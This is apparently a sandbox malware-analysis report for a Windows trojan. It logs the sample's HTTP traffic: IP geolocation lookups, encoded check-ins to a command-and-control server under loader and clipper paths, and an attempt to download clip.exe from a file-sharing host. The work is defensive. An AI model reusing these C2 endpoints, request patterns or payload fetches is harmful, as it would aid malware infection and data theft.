                            Data Raw: 7b 22 6c 6f 61 64 65 72 22 3a 22 59 7a 63 73 4e 57 49 73 5a 44 67 73 5a 47 49 73 59 7a 51 73 59 32 59 73 59 6a 63 73 5a 57 49 73 5a 44 6b 73 59 6a 59 73 59 6a 6b 73 59 6a 6b 73 4f 54 67 73 5a 54 67 73 59 6a 45 73 59 54 67 73 59 54 55 73 4e 6d 51 73 4e 32 49 73 4e 7a 55 73 4e 6a 67 73 4f 57 55 73 4f 47 55 73 4f 44 67 73 59 6a 63 73 5a 47 51 73 5a 57 49 73 5a 47 45 73 5a 47 59 73 5a 47 45 73 59 7a 49 73 4e 54 55 73 4f 44 59 73 4e 54 6b 73 59 54 59 73 4f 47 55 73 4e 7a 51 73 4f 54 41 73 59 6a 59 73 5a 47 51 73 5a 54 59 73 59 6a 4d 73 59 7a 6b 73 59 7a 45 73 4f 54 59 73 5a 54 49 73 4e 6d 59 73 4e 32 51 73 4e 54 4d 73 59 7a 59 73 4e 6a 4d 73 59 7a 6b 73 59 54 41 73 5a 47 59 73 5a 44 4d 73 4f 44 67 73 4f 54 41 73 4f 44 67 73 59 57 51 73 4f 57 49 73 4f 54 6b 73 4f 44 55 73 4e 7a 59 73 59 54 59 73 59 7a 41 73 4f 57 45 73 5a 57 45 73 5a 44 63 73 59 7a 63 73 4f 54 41 73 4e 32 55 73 4f 54 67 73 5a 57 55 73 59 7a 51 73 59 7a 6b 73 59 6a 67 73 59 6a 41 73 59 54 59 73 4e 6d 51 73 4e 6a 55 73 59 54 63 73 59 57 4d 73 59 54 4d 73 59 7a 45 73 4f 57 4d 73 5a 54 59 73 4f 54 41 73 59 54 41 73 4e 7a 59 73 5a 54 4d 73 4f 54 6b 73 5a 47 59 73 5a 44 49 73 5a 47 51 73 59 7a 67 73 4e 54 55 73 4f 44 59 73 4e 54 6b 73 4f 54 67 73 59 54 4d 73 59 7a 49 73 4f 47 55 73 59 54 6b 73 5a 57 45 73 5a 57 4d 73 59 7a 45 73 59 7a 59 73 4e 7a 4d 73 59 54 49 73 5a 47 51 73 59 6a 41 73 59 6a 67 73 59 54 55 73 59 6d 51 73 59 54 59 73 59 6a 6b 73 4e 54 6b 73 4f 57 55 73 4f 47 55 73 4f 44 67 73 59 7a 6b 73 5a 47 4d 73 5a 44 67 73 5a 47 59 73 5a 54 49 73 5a 44 67 73 4e 7a 59 73 4e 6d 51 73 4e 6d 4d 73 4f 57 59 73 5a 44 63 73 59 32 55 73 59 7a 63 73 5a 44 4d 73 59 7a 45 73 5a 6a 55 73 22 2c 22 74 61 73 6b 73 22 3a 22 59 54 63 73 59 6a 51 73 4f 54 67 73 59 32 49 73 59 6a 67 73 4f 54 41 73 4e 32 55 73 4f 54 67 73 59 6a 41 73 4f 44 59 73 4f 47 4d 73 4e 32 59 73 4e 54 4d 73 4f 57 4d 73 59 6a 6b 73 59 57 4d 73 59 54 45 73 59 6a 59 73 4e 6a 4d 73 4f 47 59 73 4e 54 63 73 4f 54 51 73 5a 44 59 73 5a 47 45 73 59 32 45 73 5a 44 67 73 5a 57 45 73 59 54 55 73 4f 57 4d 73 4f 54
                            Data Ascii: {"loader":"YzcsNWIsZDgsZGIsYzQsY2YsYjcsZWIsZDksYjYsYjksYjksOTgsZTgsYjEsYTgsYTUsNmQsN2IsNzUsNjgsOWUsOGUsODgsYjcsZGQsZWIsZGEsZGYsZGEsYzIsNTUsODYsNTksYTYsOGUsNzQsOTAsYjYsZGQsZTYsYjMsYzksYzEsOTYsZTIsNmYsN2QsNTMsYzYsNjMsYzksYTAsZGYsZDMsODgsOTAsODgsYWQsOWIsOTksODUsNzYsYTYsYzAsOWEsZWEsZDcsYzcsOTAsN2UsOTgsZWUsYzQsYzksYjgsYjAsYTYsNmQsNjUsYTcsYWMsYTMsYzEsOWMsZTYsOTAsYTAsNzYsZTMsOTksZGYsZDIsZGQsYzgsNTUsODYsNTksOTgsYTMsYzIsOGUsYTksZWEsZWMsYzEsYzYsNzMsYTIsZGQsYjAsYjgsYTUsYmQsYTYsYjksNTksOWUsOGUsODgsYzksZGMsZDgsZGYsZTIsZDgsNzYsNmQsNmMsOWYsZDcsY2UsYzcsZDMsYzEsZjUs","tasks":"YTcsYjQsOTgsY2IsYjgsOTAsN2UsOTgsYjAsODYsOGMsN2YsNTMsOWMsYjksYWMsYTEsYjYsNjMsOGYsNTcsOTQsZDYsZGEsY2EsZDgsZWEsYTUsOWMsOT
                            May 14, 2023 04:52:38.220056057 CEST3426INData Raw: 51 73 59 7a 67 73 59 54 55 73 59 57 51 73 59 54 63 73 5a 54 6b 73 59 7a 67 73 59 6a 6b 73 5a 54 41 73 4e 7a 49 73 5a 57 49 73 5a 54 49 73 4f 44 45 73 59 6d 49 73 59 6a 67 73 59 54 63 73 59 54 6b 73 4e 32 55 73 4f 54 4d 73 4f 44 55 73 59 6a 55 73
                            Data Ascii: QsYzgsYTUsYWQsYTcsZTksYzgsYjksZTAsNzIsZWIsZTIsODEsYmIsYjgsYTcsYTksN2UsOTMsODUsYjUsOTUsYzcsNjYsZDUsZGEsY2YsYzYsOTYsZGMsZTMsZDIsODcsODAsNTMsNmUsOWYsZGYsY2UsYjksY2QsYjQsZDksZWUsYmEsNzYsOGQsNTMsOWMsOGUsYjMsYTMsOGYsYTIsYzksOTgsOTQsOWEsODYsNzgsY2UsZ
                            May 14, 2023 04:52:38.220082045 CEST3427INData Raw: 4e 54 55 73 59 6d 59 73 59 57 51 73 5a 44 63 73 5a 44 51 73 59 7a 67 73 4f 54 41 73 4e 32 55 73 4f 54 67 73 59 57 49 73 4e 32 55 73 4e 7a 51 73 4e 7a 55 73 4f 54 51 73 5a 57 59 73 59 7a 45 73 59 6a 49 73 59 54 55 73 59 7a 41 73 59 57 59 73 4e 7a
                            Data Ascii: NTUsYmYsYWQsZDcsZDQsYzgsOTAsN2UsOTgsYWIsN2UsNzQsNzUsOTQsZWYsYzEsYjIsYTUsYzAsYWYsNzcsNzEsOTIsOWUsOTIsNzYsOGEsZTksZDAsZDksYzYsYzksYTEsYWYsYTEsOTgsOWMsNzQsOWUsNzAsOTgsOWMsYmEsYmQsYjcsOTgsOWMsODcsNjMsNjQsNzcsNjEsNzcsYTcsZTcsZGIsZDYsNzgsYTIsOTcsZTY


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            2192.168.2.349692208.95.112.180C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            TimestampkBytes transferredDirectionData
                            May 14, 2023 04:49:30.792505980 CEST11OUTGET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1
                            Content-Type: application/json
                            User-Agent: Monkey
                            Host: ip-api.com
                            May 14, 2023 04:49:30.834532022 CEST11INHTTP/1.1 200 OK
                            Date: Sun, 14 May 2023 02:49:30 GMT
                            Content-Type: application/json; charset=utf-8
                            Content-Length: 110
                            Access-Control-Allow-Origin: *
                            X-Ttl: 60
                            X-Rl: 44
                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 37 22 7d
                            Data Ascii: {"status":"success","countryCode":"CH","city":"Hunenberg","timezone":"Europe/Zurich","query":"102.129.143.47"}


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            3192.168.2.349700185.159.129.16880C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            TimestampkBytes transferredDirectionData
                            May 14, 2023 04:49:52.049341917 CEST155OUTPUT /loader/OWUsODMsODQsOWIsOWYsODIsOGEsOTIsNjgsN2Us HTTP/1.1
                            Content-Type: application/json
                            User-Agent: Monkey
                            Host: 185.159.129.168
                            Content-Length: 599
                            Cache-Control: no-cache
                            Data Raw: 7b 22 64 61 74 61 22 3a 22 59 6a 67 73 59 54 67 73 5a 44 63 73 59 7a 59 73 59 6a 6b 73 5a 54 41 73 4f 47 51 73 5a 47 4d 73 59 6a 63 73 4f 44 63 73 4f 44 67 73 4f 44 55 73 4e 54 6b 73 5a 54 45 73 59 7a 49 73 59 57 4d 73 4f 54 63 73 4f 44 67 73 4f 44 55 73 4f 44 55 73 4e 6d 51 73 59 6a 63 73 59 6a 49 73 4f 57 4d 73 4f 44 6b 73 4f 57 51 73 59 57 51 73 59 54 4d 73 59 6a 4d 73 4f 57 49 73 4f 44 67 73 4e 7a 67 73 4f 44 55 73 4e 32 45 73 59 57 59 73 4f 54 63 73 4f 44 6b 73 59 6a 45 73 4e 7a 67 73 59 6a 41 73 59 6a 4d 73 4f 47 49 73 4f 57 45 73 4f 44 67 73 4e 7a 6b 73 59 57 59 73 4f 44 51 73 4f 44 55 73 4e 6d 4d 73 4f 47 4d 73 4e 6a 63 73 59 6a 67 73 59 54 59 73 5a 47 59 73 5a 47 55 73 5a 47 49 73 59 32 45 73 59 32 51 73 5a 54 6b 73 59 54 67 73 59 54 45 73 4f 54 55 73 4f 44 6b 73 4e 6a 63 73 4f 44 49 73 4e 6d 51 73 4f 57 4d 73 5a 44 63 73 59 7a 63 73 5a 44 4d 73 59 6a 59 73 59 6a 55 73 5a 54 49 73 59 6a 4d 73 59 7a 59 73 59 6a 63 73 59 57 51 73 59 54 41 73 59 6d 55 73 59 6a 67 73 4f 54 67 73 59 6d 51 73 59 6d 45 73 4f 54 49 73 4e 6a 67 73 59 54 49 73 59 54 41 73 4f 54 51 73 4f 44 63 73 4f 57 45 73 59 6a 41 73 4f 54 6b 73 4f 57 55 73 4f 54 6b 73 4f 44 63 73 4e 6a 45 73 4f 44 41 73 4e 7a 41 73 4f 57 4d 73 59 7a 55 73 59 7a 4d 73 5a 54 4d 73 59 6a 49 73 5a 57 4d 73 5a 57 4d 73 59 32 49 73 4f 54 45 73 4f 54 59 73 4e 32 49 73 59 54 41 73 59 6a 41 73 59 57 4d 73 59 54 63 73 59 7a 51 73 4e 32 55 73 4f 57 51 73 59 57 4d 73 5a 54 41 73 5a 44 4d 73 5a 44 51 73 59 6a 67 73 59 32 51 73 5a 54 6b 73 5a 44 49 73 4f 54 4d 73 5a 44 6b 73 59 6d 51 73 59 54 41 73 59 6a 45 73 59 6a 4d 73 5a 54 55 73 5a 44 41 73 59 6a 6b 73 59 57 49 73 4f 44 6b 73 5a 57 51 73 5a 57 4d 73 59 7a 45 73 59 7a 51 73 59 6a 67 73 4e 6a 49 73 5a 44 51 73 59 7a 49 73 59 6a 55 73 4f 57 4d 73 59 57 55 73 59 54 6b 3d 22 7d
                            Data Ascii: {"data":"YjgsYTgsZDcsYzYsYjksZTAsOGQsZGMsYjcsODcsODgsODUsNTksZTEsYzIsYWMsOTcsODgsODUsODUsNmQsYjcsYjIsOWMsODksOWQsYWQsYTMsYjMsOWIsODgsNzgsODUsN2EsYWYsOTcsODksYjEsNzgsYjAsYjMsOGIsOWEsODgsNzksYWYsODQsODUsNmMsOGMsNjcsYjgsYTYsZGYsZGUsZGIsY2EsY2QsZTksYTgsYTEsOTUsODksNjcsODIsNmQsOWMsZDcsYzcsZDMsYjYsYjUsZTIsYjMsYzYsYjcsYWQsYTAsYmUsYjgsOTgsYmQsYmEsOTIsNjgsYTIsYTAsOTQsODcsOWEsYjAsOTksOWUsOTksODcsNjEsODAsNzAsOWMsYzUsYzMsZTMsYjIsZWMsZWMsY2IsOTEsOTYsN2IsYTAsYjAsYWMsYTcsYzQsN2UsOWQsYWMsZTAsZDMsZDQsYjgsY2QsZTksZDIsOTMsZDksYmQsYTAsYjEsYjMsZTUsZDAsYjksYWIsODksZWQsZWMsYzEsYzQsYjgsNjIsZDQsYzIsYjUsOWMsYWUsYTk="}
                            May 14, 2023 04:49:52.255124092 CEST156INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Sun, 14 May 2023 02:49:52 GMT
                            Content-Type: application/json
                            Content-Length: 2336
                            Connection: keep-alive
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6VdoCPNlsxDE4VlhsVvh8K2YfQMsuEm70H8%2BFKdAHRCwNXno0xJxsCnxD6M6CjurCS6HH6xaDGd5fcmxrzMqZlht%2FeRmNvF9CJK33foGUzB1SrG7eCtytPN3Npv9KapCYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            CF-RAY: 7c6fd4949941d983-HEL
                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                            Data Raw: 7b 22 6c 6f 61 64 65 72 22 3a 22 59 7a 63 73 4e 57 49 73 5a 44 67 73 5a 47 49 73 59 7a 51 73 59 32 59 73 59 6a 63 73 5a 57 49 73 5a 44 6b 73 59 6a 59 73 59 6a 6b 73 59 6a 6b 73 4f 54 67 73 5a 54 67 73 59 6a 45 73 59 54 67 73 59 54 55 73 4e 6d 51 73 4e 32 49 73 4e 7a 55 73 4e 6a 67 73 4f 57 55 73 4f 47 55 73 4f 44 67 73 59 6a 63 73 5a 47 51 73 5a 57 49 73 5a 47 45 73 5a 47 59 73 5a 47 45 73 59 7a 49 73 4e 54 55 73 4f 44 59 73 4e 54 6b 73 59 54 59 73 4f 47 55 73 4e 7a 51 73 4f 54 41 73 59 6a 59 73 5a 47 51 73 5a 54 59 73 59 6a 4d 73 59 7a 6b 73 59 7a 45 73 4f 54 59 73 5a 54 49 73 4e 6d 59 73 4e 32 51 73 4e 54 4d 73 59 7a 59 73 4e 6a 4d 73 59 7a 6b 73 59 54 41 73 5a 47 59 73 5a 44 4d 73 4f 44 67 73 4f 54 41 73 4f 44 67 73 59 57 51 73 4f 57 49 73 4f 54 6b 73 4f 44 55 73 4e 7a 59 73 59 54 59 73 59 7a 41 73 4f 57 45 73 5a 57 45 73 5a 44 63 73 59 7a 63 73 4f 54 41 73 4e 32 55 73 4f 54 67 73 5a 57 55 73 59 7a 51 73 59 7a 6b 73 59 6a 67 73 59 6a 41 73 59 54 59 73 4e 6d 51 73 4e 6a 55 73 59 54 63 73 59 57 4d 73 59 54 4d 73 59 7a 45 73 4f 57 4d 73 5a 54 59 73 4f 54 41 73 59 54 41 73 4e 7a 59 73 5a 54 4d 73 4f 54 6b 73 5a 47 59 73 5a 44 49 73 5a 47 51 73 59 7a 67 73 4e 54 55 73 4f 44 59 73 4e 54 6b 73 4f 54 67 73 59 54 4d 73 59 7a 49 73 4f 47 55 73 59 54 6b 73 5a 57 45 73 5a 57 4d 73 59 7a 45 73 59 7a 59 73 4e 7a 4d 73 59 54 49 73 5a 47 51 73 59 6a 41 73 59 6a 67 73 59 54 55 73 59 6d 51 73 59 54 59 73 59 6a 6b 73 4e 54 6b 73 4f 57 55 73 4f 47 55 73 4f 44 67 73 59 7a 6b 73 5a 47 4d 73 5a 44 67 73 5a 47 59 73 5a 54 49 73 5a 44 67 73 4e 7a 59 73 4e 6d 51 73 4e 6d 4d 73 4f 57 59 73 5a 44 63 73 59 32 55 73 59 7a 63 73 5a 44 4d 73 59 7a 45 73 5a 6a 55 73 22 2c 22 74 61 73 6b 73 22 3a 22 59 54 63 73 59 6a 51 73 4f 54 67 73 59 32 49 73 59 6a 67 73 4f 54 41 73 4e 32 55 73 4f 54 67 73 59 6a 41 73 4f 44 59 73 4f 47 4d 73 4e 32 59 73 4e 54 4d 73 4f 57 4d 73 59 6a 6b 73 59 57 4d 73 59 54 45 73 59 6a 59 73 4e 6a 4d 73 4f 47 59 73 4e 54 63 73 4f 54 51 73 5a 44 59 73 5a 47 45 73 59 32 45 73 5a 44 67 73 5a 57 45 73 59 54 55 73 4f 57 4d 73 4f 54 51 73
                            Data Ascii: {"loader":"YzcsNWIsZDgsZGIsYzQsY2YsYjcsZWIsZDksYjYsYjksYjksOTgsZTgsYjEsYTgsYTUsNmQsN2IsNzUsNjgsOWUsOGUsODgsYjcsZGQsZWIsZGEsZGYsZGEsYzIsNTUsODYsNTksYTYsOGUsNzQsOTAsYjYsZGQsZTYsYjMsYzksYzEsOTYsZTIsNmYsN2QsNTMsYzYsNjMsYzksYTAsZGYsZDMsODgsOTAsODgsYWQsOWIsOTksODUsNzYsYTYsYzAsOWEsZWEsZDcsYzcsOTAsN2UsOTgsZWUsYzQsYzksYjgsYjAsYTYsNmQsNjUsYTcsYWMsYTMsYzEsOWMsZTYsOTAsYTAsNzYsZTMsOTksZGYsZDIsZGQsYzgsNTUsODYsNTksOTgsYTMsYzIsOGUsYTksZWEsZWMsYzEsYzYsNzMsYTIsZGQsYjAsYjgsYTUsYmQsYTYsYjksNTksOWUsOGUsODgsYzksZGMsZDgsZGYsZTIsZDgsNzYsNmQsNmMsOWYsZDcsY2UsYzcsZDMsYzEsZjUs","tasks":"YTcsYjQsOTgsY2IsYjgsOTAsN2UsOTgsYjAsODYsOGMsN2YsNTMsOWMsYjksYWMsYTEsYjYsNjMsOGYsNTcsOTQsZDYsZGEsY2EsZDgsZWEsYTUsOWMsOTQs
                            May 14, 2023 04:49:52.255157948 CEST157INData Raw: 59 7a 67 73 59 54 55 73 59 57 51 73 59 54 63 73 5a 54 6b 73 59 7a 67 73 59 6a 6b 73 5a 54 41 73 4e 7a 49 73 5a 57 49 73 5a 54 49 73 4f 44 45 73 59 6d 49 73 59 6a 67 73 59 54 63 73 59 54 6b 73 4e 32 55 73 4f 54 4d 73 4f 44 55 73 59 6a 55 73 4f 54
                            Data Ascii: YzgsYTUsYWQsYTcsZTksYzgsYjksZTAsNzIsZWIsZTIsODEsYmIsYjgsYTcsYTksN2UsOTMsODUsYjUsOTUsYzcsNjYsZDUsZGEsY2YsYzYsOTYsZGMsZTMsZDIsODcsODAsNTMsNmUsOWYsZGYsY2UsYjksY2QsYjQsZDksZWUsYmEsNzYsOGQsNTMsOWMsOGUsYjMsYTMsOGYsYTIsYzksOTgsOTQsOWEsODYsNzgsY2UsZTA
                            May 14, 2023 04:49:52.255184889 CEST158INData Raw: 55 73 59 6d 59 73 59 57 51 73 5a 44 63 73 5a 44 51 73 59 7a 67 73 4f 54 41 73 4e 32 55 73 4f 54 67 73 59 57 49 73 4e 32 55 73 4e 7a 51 73 4e 7a 55 73 4f 54 51 73 5a 57 59 73 59 7a 45 73 59 6a 49 73 59 54 55 73 59 7a 41 73 59 57 59 73 4e 7a 63 73
                            Data Ascii: UsYmYsYWQsZDcsZDQsYzgsOTAsN2UsOTgsYWIsN2UsNzQsNzUsOTQsZWYsYzEsYjIsYTUsYzAsYWYsNzcsNzEsOTIsOWUsOTIsNzYsOGEsZTksZDAsZDksYzYsYzksYTEsYWYsYTEsOTgsOWMsNzQsOWUsNzAsOTgsOWMsYmEsYmQsYjcsOTgsOWMsODcsNjMsNjQsNzcsNjEsNzcsYTcsZTcsZGIsZDYsNzgsYTIsOTcsZTYsO


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            4192.168.2.349701144.76.136.15380C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            TimestampkBytes transferredDirectionData
                            May 14, 2023 04:49:52.692018032 CEST158OUTGET /get/1PRjTr/clip.exe HTTP/1.1
                            Content-Type: application/json
                            User-Agent: Monkey
                            Host: transfer.sh
                            May 14, 2023 04:49:52.716860056 CEST159INHTTP/1.1 301 Moved Permanently
                            Server: nginx/1.18.0
                            Date: Sun, 14 May 2023 02:49:52 GMT
                            Content-Type: text/html
                            Content-Length: 169
                            Connection: keep-alive
                            Location: https://transfer.sh/get/1PRjTr/clip.exe
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            5192.168.2.349704208.95.112.180C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            TimestampkBytes transferredDirectionData
                            May 14, 2023 04:50:39.348226070 CEST1777OUTGET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1
                            Content-Type: application/json
                            User-Agent: Cat
                            Host: ip-api.com
                            May 14, 2023 04:50:39.386030912 CEST1777INHTTP/1.1 200 OK
                            Date: Sun, 14 May 2023 02:50:39 GMT
                            Content-Type: application/json; charset=utf-8
                            Content-Length: 110
                            Access-Control-Allow-Origin: *
                            X-Ttl: 60
                            X-Rl: 44
                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 37 22 7d
                            Data Ascii: {"status":"success","countryCode":"CH","city":"Hunenberg","timezone":"Europe/Zurich","query":"102.129.143.47"}


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            6192.168.2.349706185.159.129.16880C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            TimestampkBytes transferredDirectionData
                            May 14, 2023 04:51:00.561949015 CEST1780OUTPUT /clpr/OWUsODMsODQsOWIsOWYsODIsOGEsOTIsNjgsN2Us HTTP/1.1
                            Content-Type: application/json
                            User-Agent: Cat
                            Host: 185.159.129.168
                            Content-Length: 599
                            Cache-Control: no-cache
                            Data Raw: 7b 22 64 61 74 61 22 3a 22 59 57 59 73 59 54 55 73 5a 47 59 73 5a 44 49 73 59 7a 51 73 5a 44 4d 73 59 6a 59 73 59 7a 45 73 5a 47 55 73 4f 47 59 73 4f 47 51 73 4f 44 63 73 4e 54 6b 73 5a 54 45 73 59 7a 49 73 59 57 4d 73 4f 54 63 73 4f 44 67 73 4f 44 55 73 4f 44 55 73 4e 6d 51 73 59 6a 63 73 59 6a 49 73 4f 57 4d 73 4f 44 6b 73 4f 57 51 73 59 57 51 73 59 54 4d 73 59 6a 4d 73 4f 57 49 73 4f 44 67 73 4e 7a 67 73 4f 44 55 73 4e 32 45 73 59 57 59 73 4f 54 63 73 4f 44 6b 73 59 6a 45 73 4e 7a 67 73 59 6a 41 73 59 6a 4d 73 4f 47 49 73 4f 57 45 73 4f 44 67 73 4e 7a 6b 73 59 57 59 73 4f 44 51 73 4f 44 55 73 4e 6d 4d 73 4f 47 4d 73 4e 6a 63 73 59 6a 67 73 59 54 59 73 5a 47 59 73 5a 47 55 73 5a 47 49 73 59 32 45 73 59 32 51 73 5a 54 6b 73 59 54 67 73 59 54 45 73 4f 54 55 73 4f 44 6b 73 4e 6a 63 73 4f 44 49 73 4e 6d 51 73 4f 57 4d 73 5a 44 63 73 59 7a 63 73 5a 44 4d 73 59 6a 59 73 59 6a 55 73 5a 54 49 73 59 6a 4d 73 59 7a 59 73 59 6a 63 73 59 57 51 73 59 54 41 73 59 6d 55 73 59 6a 67 73 4f 54 67 73 59 6d 51 73 59 6d 45 73 4f 54 49 73 4e 6a 67 73 59 54 49 73 59 54 41 73 4f 54 51 73 4f 44 63 73 4f 57 45 73 59 6a 41 73 4f 54 6b 73 4f 57 55 73 4f 54 6b 73 4f 44 63 73 4e 6a 45 73 4f 44 41 73 4e 7a 41 73 4f 57 4d 73 59 7a 55 73 59 7a 4d 73 5a 54 4d 73 59 6a 49 73 5a 57 4d 73 5a 57 4d 73 59 32 49 73 4f 54 45 73 4f 54 59 73 4e 32 49 73 59 54 41 73 59 6a 41 73 59 57 4d 73 59 54 63 73 59 7a 51 73 4e 32 55 73 4f 57 51 73 59 57 4d 73 5a 54 41 73 5a 44 4d 73 5a 44 51 73 59 6a 67 73 59 32 51 73 5a 54 6b 73 5a 44 49 73 4f 54 4d 73 5a 44 6b 73 59 6d 51 73 59 54 41 73 59 6a 45 73 59 6a 4d 73 5a 54 55 73 5a 44 41 73 59 6a 6b 73 59 57 49 73 4f 44 6b 73 5a 57 51 73 5a 57 4d 73 59 7a 45 73 59 7a 51 73 59 6a 67 73 4e 6a 49 73 5a 44 51 73 59 7a 49 73 59 6a 55 73 4f 57 4d 73 59 57 55 73 59 54 6b 3d 22 7d
                            Data Ascii: {"data":"YWYsYTUsZGYsZDIsYzQsZDMsYjYsYzEsZGUsOGYsOGQsODcsNTksZTEsYzIsYWMsOTcsODgsODUsODUsNmQsYjcsYjIsOWMsODksOWQsYWQsYTMsYjMsOWIsODgsNzgsODUsN2EsYWYsOTcsODksYjEsNzgsYjAsYjMsOGIsOWEsODgsNzksYWYsODQsODUsNmMsOGMsNjcsYjgsYTYsZGYsZGUsZGIsY2EsY2QsZTksYTgsYTEsOTUsODksNjcsODIsNmQsOWMsZDcsYzcsZDMsYjYsYjUsZTIsYjMsYzYsYjcsYWQsYTAsYmUsYjgsOTgsYmQsYmEsOTIsNjgsYTIsYTAsOTQsODcsOWEsYjAsOTksOWUsOTksODcsNjEsODAsNzAsOWMsYzUsYzMsZTMsYjIsZWMsZWMsY2IsOTEsOTYsN2IsYTAsYjAsYWMsYTcsYzQsN2UsOWQsYWMsZTAsZDMsZDQsYjgsY2QsZTksZDIsOTMsZDksYmQsYTAsYjEsYjMsZTUsZDAsYjksYWIsODksZWQsZWMsYzEsYzQsYjgsNjIsZDQsYzIsYjUsOWMsYWUsYTk="}
                            May 14, 2023 04:51:00.751461029 CEST1782INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Sun, 14 May 2023 02:51:00 GMT
                            Content-Type: application/json
                            Content-Length: 1814
                            Connection: keep-alive
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u47%2BYsg7EUyFiHHM2BaAHtdM3iUlS6p5j4e5doI0PfFdg4A9CyNshkH8W7D2ENdq1QhD1QfdSSUe0GcCP2fRKeX5P%2FgUEA2iioXK6fAolZCVn%2B%2B52%2B3Qaw3m76WRirIX4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            CF-RAY: 7c6fd640db95d922-HEL
                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                            Data Raw: 7b 22 63 6c 69 70 70 65 72 22 3a 22 59 7a 63 73 4e 57 49 73 5a 44 67 73 5a 47 49 73 59 7a 51 73 59 32 59 73 59 6a 63 73 5a 57 49 73 5a 44 6b 73 59 6a 59 73 59 6a 6b 73 59 6a 6b 73 4f 54 67 73 5a 54 67 73 59 6a 45 73 59 54 67 73 59 54 55 73 4e 6d 51 73 4e 32 49 73 4e 7a 55 73 4e 6a 67 73 4f 57 55 73 4f 47 55 73 4f 44 67 73 59 6a 63 73 5a 47 51 73 5a 57 49 73 5a 47 45 73 5a 47 59 73 5a 47 45 73 59 7a 49 73 4e 54 55 73 4f 44 59 73 4e 54 6b 73 59 54 63 73 4f 47 55 73 4e 7a 51 73 4f 54 41 73 59 6a 51 73 5a 54 41 73 5a 54 6b 73 59 7a 41 73 59 6a 6b 73 4e 7a 55 73 4e 6d 51 73 4f 57 45 73 4e 6d 59 73 4e 7a 41 73 4e 6a 51 73 4e 6d 51 73 4e 6d 51 73 4e 7a 55 73 4e 54 6b 73 5a 44 51 73 5a 54 49 73 59 7a 6b 73 4e 7a 67 73 59 54 49 73 4f 54 63 73 4f 47 51 73 59 32 59 73 59 7a 67 73 4f 44 55 73 59 54 51 73 59 7a 59 73 4f 57 51 73 5a 57 59 73 4f 54 59 73 59 32 51 73 5a 54 51 73 59 6a 55 73 5a 57 55 73 5a 54 51 73 4f 44 63 73 59 6d 45 73 4f 47 49 73 59 57 51 73 5a 54 41 73 59 6d 55 73 59 6a 6b 73 4e 6a 4d 73 59 6d 55 73 59 6d 49 73 59 7a 63 73 59 54 4d 73 5a 47 45 73 5a 54 4d 73 5a 44 41 73 59 6d 45 73 59 32 49 73 5a 57 55 73 5a 47 49 73 5a 54 4d 73 59 7a 6b 73 4f 44 51 73 4f 54 6b 73 4f 44 55 73 59 54 41 73 5a 57 45 73 5a 44 41 73 4f 47 45 73 5a 44 45 73 4e 6a 59 73 59 54 51 73 4f 57 45 73 4e 7a 51 73 59 6a 59 73 59 6a 59 73 4f 57 49 73 4f 57 4d 73 4f 44 63 73 4e 6a 4d 73 4e 54 55 73 59 6d 4d 73 59 6a 45 73 59 6a 59 73 59 54 55 73 5a 44 63 73 59 54 49 73 5a 47 55 73 59 7a 6b 73 5a 47 4d 73 59 54 63 73 59 54 4d 73 5a 44 45 73 